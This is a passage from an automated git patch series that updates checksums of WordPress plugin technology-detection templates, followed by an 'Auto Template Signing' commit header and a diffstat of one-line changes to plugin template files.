-http/technologies/wordpress/plugins/one-click-demo-import.yaml:2c8e8d97341c72dbafd70cbff01ceda6a0511baa -http/technologies/wordpress/plugins/optinmonster.yaml:3df3af3c14bd562a87953b0264d328f1e0ea3258 -http/technologies/wordpress/plugins/otter-blocks.yaml:cb5593f11156d06ac88b2250626d0fad2f773379 -http/technologies/wordpress/plugins/password-protected.yaml:5758777801a82bbd25f6cb094d48c843ddd7c793 -http/technologies/wordpress/plugins/pdf-embedder.yaml:1180732842479e550cab098c62102844ba5d6888 +http/technologies/wordpress/plugins/mailchimp-for-woocommerce.yaml:772f0c28175630aec6a63eb504d2ea1b74a25dd2 +http/technologies/wordpress/plugins/mailchimp-for-wp.yaml:1c05f90eb50f3a8f072925cd0303e84b199e41ec +http/technologies/wordpress/plugins/mailpoet.yaml:76728bbd00bb646eec55a8a5e6c469a30a718300 +http/technologies/wordpress/plugins/maintenance.yaml:44bd53f11dedde34fbc81dd58604744f1d183223 +http/technologies/wordpress/plugins/mainwp-child.yaml:fbf0ec1689a90f783c8ceb02f7a04382c39309e5 +http/technologies/wordpress/plugins/malcare-security.yaml:5f2ef05bae54a6a05dba95fac2c45753422d9185 +http/technologies/wordpress/plugins/megamenu.yaml:3a3867b2e7000490acec8a1db0f7765ed9fc8fe1 +http/technologies/wordpress/plugins/members.yaml:ba857dc41e1d31243de30015c4d9470d42df8c53 +http/technologies/wordpress/plugins/meta-box.yaml:8c38bd4306888e54dc3391102d10fa72837e1043 +http/technologies/wordpress/plugins/metform.yaml:90f52dbae57fb96e16c98281f8524d0daf351e9e +http/technologies/wordpress/plugins/ml-slider.yaml:7ed06a67a393d9bf9c1354a894fa26bca17fd4a2 +http/technologies/wordpress/plugins/newsletter.yaml:3ee3c651239599cb45dcf220c7409494c9ebe9c3 +http/technologies/wordpress/plugins/nextend-facebook-connect.yaml:0c33021a4eefb6a660c593071371537361dfb84d +http/technologies/wordpress/plugins/nextgen-gallery.yaml:ea5e79cd98b84b48b69a0145227d4ec435ed5392 +http/technologies/wordpress/plugins/ninja-forms.yaml:eaafa820796d0c404ee59dd9efefab26c58c4624 +http/technologies/wordpress/plugins/ocean-extra.yaml:65228be6752d1dc95c05dd0a4c75209b04a41790 +http/technologies/wordpress/plugins/official-facebook-pixel.yaml:42b1aeba39e9d1062b8b35b5d6fc1c9ac92914f0 +http/technologies/wordpress/plugins/one-click-demo-import.yaml:9b10160492a86d235ec330579fdefa5eb92b1a95 +http/technologies/wordpress/plugins/optinmonster.yaml:cb72b324f850b87de1beac0dce1f120bd5e89a47 +http/technologies/wordpress/plugins/otter-blocks.yaml:1d77ec76194db956e207c4671a626de6fb1b20e7 +http/technologies/wordpress/plugins/password-protected.yaml:691f351480bb6cd23aa7afedf5dcde3862b61154 +http/technologies/wordpress/plugins/pdf-embedder.yaml:93ec0b4ddeff00afbd2b34a4e49371ceb2d4c48d http/technologies/wordpress/plugins/photo-gallery.yaml:37274dfdbd25ec4bcb7a3f79052c88d9df2c023e http/technologies/wordpress/plugins/php-compatibility-checker.yaml:9ae2457c7e9d21bee89ff0283903047bd188b93d -http/technologies/wordpress/plugins/pinterest-for-woocommerce.yaml:cd323f5684cd4a2e475749245d874d2868d66635 -http/technologies/wordpress/plugins/pixelyoursite.yaml:43e98c17986cb83f559a7b66b14d8f0e1ea995cb -http/technologies/wordpress/plugins/polylang.yaml:201c677d7775ae157e7088e8131450c8e72b316d +http/technologies/wordpress/plugins/pinterest-for-woocommerce.yaml:ea3fc197949183230c36a54ec40ce7cec2ce05cb +http/technologies/wordpress/plugins/pixelyoursite.yaml:b5bbf81e5eb650342b3d4c2fca46310ee8801848 +http/technologies/wordpress/plugins/polylang.yaml:366f25da7da9f9f2f6aa349b25c24d9242b86c1a http/technologies/wordpress/plugins/popup-builder.yaml:468087ab250c0b356f499a501d5a948d709c9a05 -http/technologies/wordpress/plugins/popup-maker.yaml:a119f43cbbd770a907ee7d2ad13011efce567555 -http/technologies/wordpress/plugins/post-smtp.yaml:dc895cb358a618f61e6834e99accdacc0844dcf5 -http/technologies/wordpress/plugins/post-types-order.yaml:7e3540bf816be4d048425c2fb01ff8e8714dab84 -http/technologies/wordpress/plugins/premium-addons-for-elementor.yaml:c33ee34e23755ff20142ea49d583df7bc2f41c12 -http/technologies/wordpress/plugins/pretty-link.yaml:db30c7c036bb817ae8ce52bf9b3229948c1a7b1d -http/technologies/wordpress/plugins/really-simple-captcha.yaml:bc6c037badbe4128a8af6a211802e8f2ef2ceeec -http/technologies/wordpress/plugins/really-simple-ssl.yaml:035cadd420db41c138096b3b87a4349ee5c84cc1 -http/technologies/wordpress/plugins/redirection.yaml:b84a15b9bd0e8031d8901bf6a8d27178d52b3a3a -http/technologies/wordpress/plugins/redux-framework.yaml:a2715ebf2eeb42ac3fb873165efdcdb69e9ebdaf -http/technologies/wordpress/plugins/regenerate-thumbnails.yaml:aeb3f3290068227522abc6f02fec08cb256f2d9d -http/technologies/wordpress/plugins/royal-elementor-addons.yaml:c295f04b494da43cd70233731a23e12561670465 -http/technologies/wordpress/plugins/safe-svg.yaml:6146907e0b916d2efa0d5d67fd862b370bc76c55 -http/technologies/wordpress/plugins/seo-by-rank-math.yaml:99cee49480e21b048345cd7491ef4e3fbb7f1800 -http/technologies/wordpress/plugins/sg-cachepress.yaml:7b6836ae292b3fd29a3bea109a800aa5dc5db58d -http/technologies/wordpress/plugins/sg-security.yaml:236383cdf89abd2a1c762a6c012781ac80bcb1d3 -http/technologies/wordpress/plugins/shortcodes-ultimate.yaml:a9d5065147a17e49babd54ffc5f4ebaffb433c69 -http/technologies/wordpress/plugins/shortpixel-image-optimiser.yaml:7d4994ffb30b3a738179033432391284c5f79b97 -http/technologies/wordpress/plugins/simple-custom-post-order.yaml:167ceb2c0a42f1d2719ec0fa185b8bdfa837ceff -http/technologies/wordpress/plugins/simple-history.yaml:57491475d8dda459c6c85e6c3a5daaa57c7c1996 +http/technologies/wordpress/plugins/popup-maker.yaml:1c4cfb8a42e30c98281bc9a2f5c966d999c2a7d7 +http/technologies/wordpress/plugins/post-smtp.yaml:5146be93263e512b200ab784727f91612d5117f6 +http/technologies/wordpress/plugins/post-types-order.yaml:3691aaa9f183d9feef18ec4b069b169a96871b81 +http/technologies/wordpress/plugins/premium-addons-for-elementor.yaml:5eac1e84dd2eb1f27121ee409e9e4c6f69ed588c +http/technologies/wordpress/plugins/pretty-link.yaml:9babdd01d2c338a5f22e1e684a3d2a6b82424668 +http/technologies/wordpress/plugins/really-simple-captcha.yaml:f76181edda9b3d62e3ea21bd51a4d5e4c450bef6 +http/technologies/wordpress/plugins/really-simple-ssl.yaml:bb7296600fad043c5a5fa3ea8c4d3de597e133bc +http/technologies/wordpress/plugins/redirection.yaml:f2fc65063eeb5b4f425e53c33e752b0acc46e8f1 +http/technologies/wordpress/plugins/redux-framework.yaml:af9b75a984712e6609f6bd94f956e026b9dc307b +http/technologies/wordpress/plugins/regenerate-thumbnails.yaml:c0fa1d1aece59d5d6e8e708f4b2d49e769998dd9 +http/technologies/wordpress/plugins/royal-elementor-addons.yaml:81ee3491d2caa18b8f476cbc4f8bdf6645f98857 +http/technologies/wordpress/plugins/safe-svg.yaml:7593c611e1da50fc587d7a34a6447f494d5cddb8 +http/technologies/wordpress/plugins/seo-by-rank-math.yaml:91918b715b41c561ccd6da01b15c5710ceefd48d +http/technologies/wordpress/plugins/sg-cachepress.yaml:86a47e535c821c5c1af37c73687729982a7e8256 +http/technologies/wordpress/plugins/sg-security.yaml:e833734b1006bc06ee6c86a825b3902ec67fb113 +http/technologies/wordpress/plugins/shortcodes-ultimate.yaml:55d132c332394a78efb0b3130261bf37cc0612d2 +http/technologies/wordpress/plugins/shortpixel-image-optimiser.yaml:196c39da6c914816c14f11df5fc9106d9439f200 +http/technologies/wordpress/plugins/simple-custom-post-order.yaml:f7959e70ca5912ffccbe8bfb5aaf69f15dea94ad +http/technologies/wordpress/plugins/simple-history.yaml:2159d42f27309f1f6a116a76e883b46ef1087ce9 http/technologies/wordpress/plugins/simple-page-ordering.yaml:7d96ac56d7ed2ed031b6789429888ef703d39538 -http/technologies/wordpress/plugins/siteguard.yaml:95e58823cc6b51c85961fbbc884a624b83e416af -http/technologies/wordpress/plugins/siteorigin-panels.yaml:9b7fe6f885fefb92f9a62f3dbd037def8ee50bd5 -http/technologies/wordpress/plugins/smart-slider-3.yaml:451faad7065dd729fe0cd2bfbbd3ac3f94ef7035 -http/technologies/wordpress/plugins/so-widgets-bundle.yaml:2b25fda84a6fec16553940676c815d4c488ff8e6 +http/technologies/wordpress/plugins/siteguard.yaml:1603622bb764bbd891fa245b1fb0851d8443eec0 +http/technologies/wordpress/plugins/siteorigin-panels.yaml:bdd37fdd569c13441fb87d5a310a8beca53ecead +http/technologies/wordpress/plugins/smart-slider-3.yaml:6669412fae6e1f830d8132df4b3ad7036fa95746 +http/technologies/wordpress/plugins/so-widgets-bundle.yaml:9e123d8b5122703a197a8279f6b6612af707aa1f http/technologies/wordpress/plugins/ssl-insecure-content-fixer.yaml:aab70fa0f4b1c898371aa4af959db60e6cc733dd -http/technologies/wordpress/plugins/sticky-header-effects-for-elementor.yaml:bc8097b9d9235eebe55ef173705f464f0bfda5f9 -http/technologies/wordpress/plugins/stops-core-theme-and-plugin-updates.yaml:7f377a37a5cd60376685cc4f197088fba64010e6 -http/technologies/wordpress/plugins/sucuri-scanner.yaml:3e5df8bafbc47c597cb02ce100adee49f936bb99 -http/technologies/wordpress/plugins/svg-support.yaml:31b1bbd478901818b88e831e015ffe69ba1deca1 -http/technologies/wordpress/plugins/table-of-contents-plus.yaml:1119b6000394943ae8a1d017dc3c327cf09a210c -http/technologies/wordpress/plugins/tablepress.yaml:7aeb03b7055b4511c7d61e0f34851b0afafec4cc -http/technologies/wordpress/plugins/taxonomy-terms-order.yaml:44b2c2a7e6e78e9407eba0a052c4bd526b00e8c3 -http/technologies/wordpress/plugins/templately.yaml:5fa23438d9a5d3e5843076dff3d85bb0464d8cfb -http/technologies/wordpress/plugins/the-events-calendar.yaml:a5a33addc25cc9965f99b6699a7b80b24b22d3c7 +http/technologies/wordpress/plugins/sticky-header-effects-for-elementor.yaml:218b764f5e7ec74be15c072c6dcef4976de6d79b +http/technologies/wordpress/plugins/stops-core-theme-and-plugin-updates.yaml:48e485435630e99bcc197171a946575b47361c73 +http/technologies/wordpress/plugins/sucuri-scanner.yaml:73a5d57f8a22ede9c4de7d3fba4f1aeaa4c4bb2e +http/technologies/wordpress/plugins/svg-support.yaml:9e209af3c91abf6ba27d6d2b49ddf7196dc91450 +http/technologies/wordpress/plugins/table-of-contents-plus.yaml:e9ca166f376b599e787a66db6114262e2a888811 +http/technologies/wordpress/plugins/tablepress.yaml:1907c25a373a78ea4c81d21eae209acb12104a9b +http/technologies/wordpress/plugins/taxonomy-terms-order.yaml:a8ac16c00a1fe225e48ebe24c94aba1323e1e584 +http/technologies/wordpress/plugins/templately.yaml:85704028e9e8d3e3a3ca74af306a32d502c4388d +http/technologies/wordpress/plugins/the-events-calendar.yaml:52c6ff41c4bd34154268728639cfa0e3b4f8d8ab http/technologies/wordpress/plugins/themeisle-companion.yaml:c706aef04e5b9ce414f460819eca30bb3bcb00e5 -http/technologies/wordpress/plugins/tinymce-advanced.yaml:f7e1c1edb4e7353e6fac96fb8c87fdf1bdb66fb9 -http/technologies/wordpress/plugins/translatepress-multilingual.yaml:8c87e9fffcebf5f04645f46033dbb7bed21522b3 -http/technologies/wordpress/plugins/ultimate-addons-for-gutenberg.yaml:a87e7e8277478e7505eb436685ca87c0ce130872 -http/technologies/wordpress/plugins/under-construction-page.yaml:52121a50514aaaf7d7a59ce926f54aa10cf15ba3 +http/technologies/wordpress/plugins/tinymce-advanced.yaml:9e6bb4ae3c2a1718e019e5374810c6b9e64fa3f5 +http/technologies/wordpress/plugins/translatepress-multilingual.yaml:97b7e9a9b4b15aff49cca7d5e725392e7bf627fd +http/technologies/wordpress/plugins/ultimate-addons-for-gutenberg.yaml:9c37c0d9262b2938015364f494651b05b0fa6033 +http/technologies/wordpress/plugins/under-construction-page.yaml:c76e58a7cf7365aaaa3685531874f5d2ea3d1b68 http/technologies/wordpress/plugins/unyson.yaml:e01d9f525f3cf577ab43441c694230c07608611e -http/technologies/wordpress/plugins/updraftplus.yaml:edcd863200181bd414befba2b1761eb3e2fd9534 +http/technologies/wordpress/plugins/updraftplus.yaml:5050d66d21b2380882e67332a769bc7da06154e6 http/technologies/wordpress/plugins/use-any-font.yaml:e1c358a86017c4c3f5abe62d76da6878d61f5d47 -http/technologies/wordpress/plugins/user-role-editor.yaml:49fd50c927e45ae27da74152958884a1103e653d +http/technologies/wordpress/plugins/user-role-editor.yaml:65b055fb6332b2169a9e7143591f116c146e06a8 http/technologies/wordpress/plugins/velvet-blues-update-urls.yaml:1a6d9e7560dba5c9471c20cffdf0ba1b098fbb7c -http/technologies/wordpress/plugins/w3-total-cache.yaml:5dd3991dcd1cda648cb5b06ba23e4dc161d19ef7 -http/technologies/wordpress/plugins/webp-converter-for-media.yaml:98f9af30cc234e4c7b4b5bf22f6bbaa53cbe6f5f -http/technologies/wordpress/plugins/webp-express.yaml:40e469d6a202f0160ef83d275eb6623eea3a9d3c -http/technologies/wordpress/plugins/widget-importer-exporter.yaml:719ab84147c10169bb49944409fb7d82d00b0c4d -http/technologies/wordpress/plugins/woo-cart-abandonment-recovery.yaml:c4fb3e070c29d4a21a0670a6e9b44b838c7c3391 -http/technologies/wordpress/plugins/woo-checkout-field-editor-pro.yaml:865f9552ce696e2f57cacfbff5639eebec2b7693 -http/technologies/wordpress/plugins/woo-variation-swatches.yaml:0a37f42407331ea5d7ca9d524490522c195469e6 +http/technologies/wordpress/plugins/w3-total-cache.yaml:e6d76a664a5009598ce3e2d6f3b412667c9cacef +http/technologies/wordpress/plugins/webp-converter-for-media.yaml:305690e415de547348ac36cf0d9544b347b16a38 +http/technologies/wordpress/plugins/webp-express.yaml:fcb956491146843be9f3b5f152965cc0796f75e8 +http/technologies/wordpress/plugins/widget-importer-exporter.yaml:ffa48fc0f80ceb41dff2b5c69116837b0111e074 +http/technologies/wordpress/plugins/woo-cart-abandonment-recovery.yaml:6db1302965c217cd38e160295fd9d7defa47afa9 +http/technologies/wordpress/plugins/woo-checkout-field-editor-pro.yaml:c2b6a592df83eb0b6abbfa988893633cb948b997 +http/technologies/wordpress/plugins/woo-variation-swatches.yaml:68f2dd5d2776de335efc273ddf2249b507527398 http/technologies/wordpress/plugins/woocommerce-gateway-paypal-express-checkout.yaml:4f2c82ad5cf98659804bd115d05bf9db8461e200 -http/technologies/wordpress/plugins/woocommerce-gateway-stripe.yaml:67e91a90004596978ab908106f2d82ad74bf50ca -http/technologies/wordpress/plugins/woocommerce-legacy-rest-api.yaml:c7f5487278701e4fc7714f159a8618d2a1e762b2 -http/technologies/wordpress/plugins/woocommerce-payments.yaml:ddf2a1c90df35fbbe5829da6863d0611fc266cb5 -http/technologies/wordpress/plugins/woocommerce-paypal-payments.yaml:99bf699064a6e29385722ebe2ff3f8ebb5005ac6 -http/technologies/wordpress/plugins/woocommerce-pdf-invoices-packing-slips.yaml:e4ad8d7b99eb0b0ce3e6fa1fd617b2b13cbe3b4a -http/technologies/wordpress/plugins/woocommerce-services.yaml:ccd6f7e89bea7ca67d5af5b24fead3c4926501d8 -http/technologies/wordpress/plugins/woocommerce.yaml:23253c686c07d1d1a445e7a68d6734232fd4f155 -http/technologies/wordpress/plugins/wordfence.yaml:a5d01c40c96de0bdbf4fd1b517a4b342006421a3 -http/technologies/wordpress/plugins/wordpress-importer.yaml:8d39c0c6c3425e57e2be8f6a5bd8a91e7d3a439c -http/technologies/wordpress/plugins/wordpress-seo.yaml:dc65064e66e43a467b1e9ed2c095cfc0f81af2dd +http/technologies/wordpress/plugins/woocommerce-gateway-stripe.yaml:9929d037d9f1459cff16926d024bcf666c50edda +http/technologies/wordpress/plugins/woocommerce-legacy-rest-api.yaml:e7b3acf574cd1dc2b9d4f7a6240769a83a938856 +http/technologies/wordpress/plugins/woocommerce-payments.yaml:60a3ada3d5bd510f77eb3a77c32d88ad20e997bc +http/technologies/wordpress/plugins/woocommerce-paypal-payments.yaml:b2a01f711495d5a37d201b510a6487ae816dab9b +http/technologies/wordpress/plugins/woocommerce-pdf-invoices-packing-slips.yaml:d3b1a70c5b241c5776101bdf5fb0ee9753725d4b +http/technologies/wordpress/plugins/woocommerce-services.yaml:6f9a1c3b761936c259c9e29ee32d28f691ae8b77 +http/technologies/wordpress/plugins/woocommerce.yaml:8231905d6d899f1da3fe5641cb3908eac4c1113f +http/technologies/wordpress/plugins/wordfence.yaml:43d1eb1e1e314aa16d9c1d5d0d5d4c59de91ac1b +http/technologies/wordpress/plugins/wordpress-importer.yaml:c7ba561f2a03d75e5f929c367ecdce158d4e456f +http/technologies/wordpress/plugins/wordpress-seo.yaml:a9de56a1598eaa8ab15ab968f734d71fdf2bc107 http/technologies/wordpress/plugins/wordpress-woosidebars.yaml:679cd62c97446d90fc7fbb50f64403cb10c4c319 -http/technologies/wordpress/plugins/worker.yaml:e8dfa9ca66a755e3a2d355be4bc3f6a721618550 -http/technologies/wordpress/plugins/wp-fastest-cache.yaml:42cf2cf2c77fdecad7fb821139ed5faccc69e57e -http/technologies/wordpress/plugins/wp-file-manager.yaml:fa86400c421a1a342202da7b6855be94be20456e -http/technologies/wordpress/plugins/wp-google-maps.yaml:a5e4fca1b89b58bebdf9363a523e6f73a527fb39 -http/technologies/wordpress/plugins/wp-mail-smtp.yaml:db7f011b671f3ea759d2666e5000f14cfb3091b3 -http/technologies/wordpress/plugins/wp-maintenance-mode.yaml:86aa482ac992b57460bb31b10b80e47631a3cdec -http/technologies/wordpress/plugins/wp-migrate-db.yaml:b1475c1c208a27f8c7c0242228263e38d81d8434 -http/technologies/wordpress/plugins/wp-multibyte-patch.yaml:b8d8d39f1a43a008bb7f7f802609028ba323b9e6 -http/technologies/wordpress/plugins/wp-optimize.yaml:c49183c7d82cbdd4479404990625da6818e016e2 -http/technologies/wordpress/plugins/wp-pagenavi.yaml:ce00bf598ebb81449b6ae1669ac203a68d86efd7 -http/technologies/wordpress/plugins/wp-reset.yaml:14c5010a475fa909f28391b7990844fe51a0b2b2 -http/technologies/wordpress/plugins/wp-reviews-plugin-for-google.yaml:daf3725a4ddfba16679e272e295d90112334ee22 -http/technologies/wordpress/plugins/wp-rollback.yaml:a9100438f1a2f8d577ae456d454dfc84c5177501 -http/technologies/wordpress/plugins/wp-seopress.yaml:687273af9942a9e30debdb05bf4ebd1888580346 -http/technologies/wordpress/plugins/wp-sitemap-page.yaml:5cbce95addf9da0f12f7267c3377f77a878aab60 -http/technologies/wordpress/plugins/wp-smushit.yaml:4063aad19c268ae2e25c123e911f5d8b9d256ad5 -http/technologies/wordpress/plugins/wp-statistics.yaml:8394f42eff91b17e1dbaf9a4ad9525c60aa61b65 -http/technologies/wordpress/plugins/wp-super-cache.yaml:b4ee4167ddeb2563f825be8c5f8ebf5060be257e +http/technologies/wordpress/plugins/worker.yaml:eec5a16391040875785d932499c9f260e8efeb8c +http/technologies/wordpress/plugins/wp-fastest-cache.yaml:3bac8419d21ce83693d583293fb12b438a544402 +http/technologies/wordpress/plugins/wp-file-manager.yaml:227e50238a78872a0caf5ac0c54ab4d4fa33be67 +http/technologies/wordpress/plugins/wp-google-maps.yaml:f398fe5460d8180c0e85568b79baa92355130348 +http/technologies/wordpress/plugins/wp-mail-smtp.yaml:3c08f95f3bce5c44e7c5ebda373c397d0ddb8342 +http/technologies/wordpress/plugins/wp-maintenance-mode.yaml:d7bb63c19f2338fd77cfa210fc4fa2e2c8bbff85 +http/technologies/wordpress/plugins/wp-migrate-db.yaml:996eb41fddbc34f6078ebecc34cececbb6eec504 +http/technologies/wordpress/plugins/wp-multibyte-patch.yaml:252c64b3711943bbfd6d507669f1175f2225cbb2 +http/technologies/wordpress/plugins/wp-optimize.yaml:7d8bae34481b9723031a3574ce49620e76ad88ec +http/technologies/wordpress/plugins/wp-pagenavi.yaml:2a1f36db756a5f86740144301429285d3c50fee9 +http/technologies/wordpress/plugins/wp-reset.yaml:28019b1d96d3d4c456ac774c3e5cdeb666b06859 +http/technologies/wordpress/plugins/wp-reviews-plugin-for-google.yaml:6100c61e48b0e15a0971d15714bdefa28c1fedcc +http/technologies/wordpress/plugins/wp-rollback.yaml:f7b2f501eb11a44d43b23d3933c06fe15927b2ca +http/technologies/wordpress/plugins/wp-seopress.yaml:1f1aa346cc5d9b8f6c766a4d6388dc8f90e34030 +http/technologies/wordpress/plugins/wp-sitemap-page.yaml:a4e9a4bb7976f9cab3829e15f7cf6a476a2e3792 +http/technologies/wordpress/plugins/wp-smushit.yaml:cff5012e05d9eca8dae054e4d73667340c631ddb +http/technologies/wordpress/plugins/wp-statistics.yaml:db2b26951dec4a78053fac69af816940d49cda0b +http/technologies/wordpress/plugins/wp-super-cache.yaml:312d5ce63e6b319b2688eb416664e575699fe649 http/technologies/wordpress/plugins/wp-user-avatar.yaml:a8aa0e902ead01de33b23343603d18b63829517e -http/technologies/wordpress/plugins/wpcf7-recaptcha.yaml:f99945a105e98af9e522edcb41c00e3025e312c4 -http/technologies/wordpress/plugins/wpcf7-redirect.yaml:56a26c23b1d081d31bd5976146f83be73f5d3e33 -http/technologies/wordpress/plugins/wpforms-lite.yaml:351a14423a10a1dbbee555574add5750946446f7 -http/technologies/wordpress/plugins/wps-hide-login.yaml:5fd357f902adec62bf92ece79af600e26c05eea8 -http/technologies/wordpress/plugins/wpvivid-backuprestore.yaml:600c08bccfe3d8d4946cd8c40c04e7d6fb835245 +http/technologies/wordpress/plugins/wpcf7-recaptcha.yaml:a9acaa8bc79b55109355d8894c249b6e99fba870 +http/technologies/wordpress/plugins/wpcf7-redirect.yaml:da8bff7c82756e3e1ac6810a8eb2ef194d109a43 +http/technologies/wordpress/plugins/wpforms-lite.yaml:cf27de8a9131c5a7427c0f9d3f4bfd5f378e26eb +http/technologies/wordpress/plugins/wps-hide-login.yaml:faf97e5fb87bd43caaa123bb77e5cb64d218f00d +http/technologies/wordpress/plugins/wpvivid-backuprestore.yaml:f03291859093b6ab5196a683c017e300566beb9d http/technologies/wordpress/plugins/yith-woocommerce-compare.yaml:caf39ccc6507df09c0816caa7af29404c193d9a5 -http/technologies/wordpress/plugins/yith-woocommerce-wishlist.yaml:1aa020a0a4452fc3a97327aa7417e45436ae6f59 +http/technologies/wordpress/plugins/yith-woocommerce-wishlist.yaml:c3474b242e88f3dd31b5317051e69194f36317f9 http/technologies/wordpress/themes/wp-bricks-builder-theme.yaml:0b85e26615c692bab9ceb5ae74dc9adec4097b9e http/technologies/wordpress-detect.yaml:a0148caf9d3f957171e7b75d4382dc7d54e454e5 http/technologies/workerman-websocket-detect.yaml:1396bc8234c4f538d5f57966b6b8084fe68f574f @@ -8867,7 +8867,7 @@ ssl/tls-version.yaml:4e40f08efbb39172b9280ea9e26ca5f0a14a575a ssl/untrusted-root-certificate.yaml:a91d36990a1d052f5ee64d170ad8f084d38dab19 ssl/weak-cipher-suites.yaml:62fe808d9dfafda67c410e6cb9445fdc70257e89 ssl/wildcard-tls.yaml:d244f62c7bd22d3868fc6fc7cb9550af6b261210 -templates-checksum.txt:98ad3f9c23c3f08754417333ac80eac604ecda10 +templates-checksum.txt:4193ef091c7925f655faf0f4762ae8c78c13fc1d wappalyzer-mapping.yml:7f03bd65baacac20c1dc6bbf35ff2407959574f1 workflows/74cms-workflow.yaml:bb010e767ad32b906153e36ea618be545b4e22d0 workflows/acrolinx-workflow.yaml:8434089bb55dec3d7b2ebc6a6f340e73382dd0c4 From 85b40b46a56dfb3bda61318a885520cf8d9588dd Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Thu, 11 Jul 2024 07:23:36 +0000 Subject: [PATCH 1119/1841] Auto Template Signing [Thu Jul 11 07:23:36 UTC 2024] :robot: --- http/technologies/wordpress/plugins/ad-inserter.yaml | 1 + http/technologies/wordpress/plugins/add-to-any.yaml | 1 + http/technologies/wordpress/plugins/admin-menu-editor.yaml | 1 + http/technologies/wordpress/plugins/advanced-custom-fields.yaml | 1 + http/technologies/wordpress/plugins/akismet.yaml | 1 + http/technologies/wordpress/plugins/all-in-one-seo-pack.yaml | 1 + http/technologies/wordpress/plugins/all-in-one-wp-migration.yaml | 1 + .../wordpress/plugins/all-in-one-wp-security-and-firewall.yaml | 1 + http/technologies/wordpress/plugins/amp.yaml | 1 + http/technologies/wordpress/plugins/antispam-bee.yaml | 1 + http/technologies/wordpress/plugins/astra-sites.yaml | 1 + http/technologies/wordpress/plugins/autoptimize.yaml | 1 + http/technologies/wordpress/plugins/backwpup.yaml | 1 + http/technologies/wordpress/plugins/better-search-replace.yaml | 1 + http/technologies/wordpress/plugins/better-wp-security.yaml | 1 + .../wordpress/plugins/black-studio-tinymce-widget.yaml | 1 + http/technologies/wordpress/plugins/breadcrumb-navxt.yaml | 1 + http/technologies/wordpress/plugins/breeze.yaml | 1 + http/technologies/wordpress/plugins/broken-link-checker.yaml | 1 + http/technologies/wordpress/plugins/chaty.yaml | 1 + .../technologies/wordpress/plugins/child-theme-configurator.yaml | 1 + http/technologies/wordpress/plugins/classic-editor.yaml | 1 + http/technologies/wordpress/plugins/classic-widgets.yaml | 1 + .../wordpress/plugins/click-to-chat-for-whatsapp.yaml | 1 + http/technologies/wordpress/plugins/cmb2.yaml | 1 + http/technologies/wordpress/plugins/coblocks.yaml | 1 + http/technologies/wordpress/plugins/code-snippets.yaml | 1 + http/technologies/wordpress/plugins/coming-soon.yaml | 1 + http/technologies/wordpress/plugins/complianz-gdpr.yaml | 1 + http/technologies/wordpress/plugins/contact-form-7-honeypot.yaml | 1 + http/technologies/wordpress/plugins/contact-form-7.yaml | 1 + http/technologies/wordpress/plugins/contact-form-cfdb7.yaml | 1 + http/technologies/wordpress/plugins/cookie-law-info.yaml | 1 + http/technologies/wordpress/plugins/cookie-notice.yaml | 1 + http/technologies/wordpress/plugins/copy-delete-posts.yaml | 1 + http/technologies/wordpress/plugins/creame-whatsapp-me.yaml | 1 + .../wordpress/plugins/creative-mail-by-constant-contact.yaml | 1 + http/technologies/wordpress/plugins/custom-css-js.yaml | 1 + http/technologies/wordpress/plugins/custom-fonts.yaml | 1 + http/technologies/wordpress/plugins/custom-post-type-ui.yaml | 1 + http/technologies/wordpress/plugins/disable-comments.yaml | 1 + http/technologies/wordpress/plugins/disable-gutenberg.yaml | 1 + http/technologies/wordpress/plugins/duplicate-page.yaml | 1 + http/technologies/wordpress/plugins/duplicate-post.yaml | 1 + http/technologies/wordpress/plugins/duplicator.yaml | 1 + .../wordpress/plugins/duracelltomi-google-tag-manager.yaml | 1 + http/technologies/wordpress/plugins/easy-table-of-contents.yaml | 1 + http/technologies/wordpress/plugins/easy-wp-smtp.yaml | 1 + http/technologies/wordpress/plugins/elementor.yaml | 1 + http/technologies/wordpress/plugins/elementskit-lite.yaml | 1 + http/technologies/wordpress/plugins/enable-media-replace.yaml | 1 + http/technologies/wordpress/plugins/envato-elements.yaml | 1 + .../wordpress/plugins/essential-addons-for-elementor-lite.yaml | 1 + http/technologies/wordpress/plugins/ewww-image-optimizer.yaml | 1 + .../technologies/wordpress/plugins/facebook-for-woocommerce.yaml | 1 + http/technologies/wordpress/plugins/fast-indexing-api.yaml | 1 + .../wordpress/plugins/favicon-by-realfavicongenerator.yaml | 1 + http/technologies/wordpress/plugins/flamingo.yaml | 1 + http/technologies/wordpress/plugins/fluentform.yaml | 1 + http/technologies/wordpress/plugins/font-awesome.yaml | 1 + .../wordpress/plugins/force-regenerate-thumbnails.yaml | 1 + http/technologies/wordpress/plugins/formidable.yaml | 1 + http/technologies/wordpress/plugins/forminator.yaml | 1 + http/technologies/wordpress/plugins/ga-google-analytics.yaml | 1 + http/technologies/wordpress/plugins/gdpr-cookie-compliance.yaml | 1 + .../wordpress/plugins/google-analytics-dashboard-for-wp.yaml | 1 + .../wordpress/plugins/google-analytics-for-wordpress.yaml | 1 + http/technologies/wordpress/plugins/google-listings-and-ads.yaml | 1 + http/technologies/wordpress/plugins/google-site-kit.yaml | 1 + .../technologies/wordpress/plugins/google-sitemap-generator.yaml | 1 + http/technologies/wordpress/plugins/gtranslate.yaml | 1 + http/technologies/wordpress/plugins/gutenberg.yaml | 1 + http/technologies/wordpress/plugins/happy-elementor-addons.yaml | 1 + .../wordpress/plugins/header-footer-code-manager.yaml | 1 + http/technologies/wordpress/plugins/header-footer-elementor.yaml | 1 + http/technologies/wordpress/plugins/header-footer.yaml | 1 + http/technologies/wordpress/plugins/health-check.yaml | 1 + http/technologies/wordpress/plugins/hello-dolly.yaml | 1 + http/technologies/wordpress/plugins/host-webfonts-local.yaml | 1 + http/technologies/wordpress/plugins/hostinger.yaml | 1 + http/technologies/wordpress/plugins/image-optimization.yaml | 1 + http/technologies/wordpress/plugins/imagify.yaml | 1 + http/technologies/wordpress/plugins/imsanity.yaml | 1 + .../wordpress/plugins/insert-headers-and-footers.yaml | 1 + http/technologies/wordpress/plugins/instagram-feed.yaml | 1 + .../wordpress/plugins/intuitive-custom-post-order.yaml | 1 + http/technologies/wordpress/plugins/jetpack-boost.yaml | 1 + http/technologies/wordpress/plugins/jetpack.yaml | 1 + http/technologies/wordpress/plugins/kadence-blocks.yaml | 1 + http/technologies/wordpress/plugins/kirki.yaml | 1 + http/technologies/wordpress/plugins/leadin.yaml | 1 + .../wordpress/plugins/limit-login-attempts-reloaded.yaml | 1 + http/technologies/wordpress/plugins/limit-login-attempts.yaml | 1 + http/technologies/wordpress/plugins/litespeed-cache.yaml | 1 + http/technologies/wordpress/plugins/loco-translate.yaml | 1 + 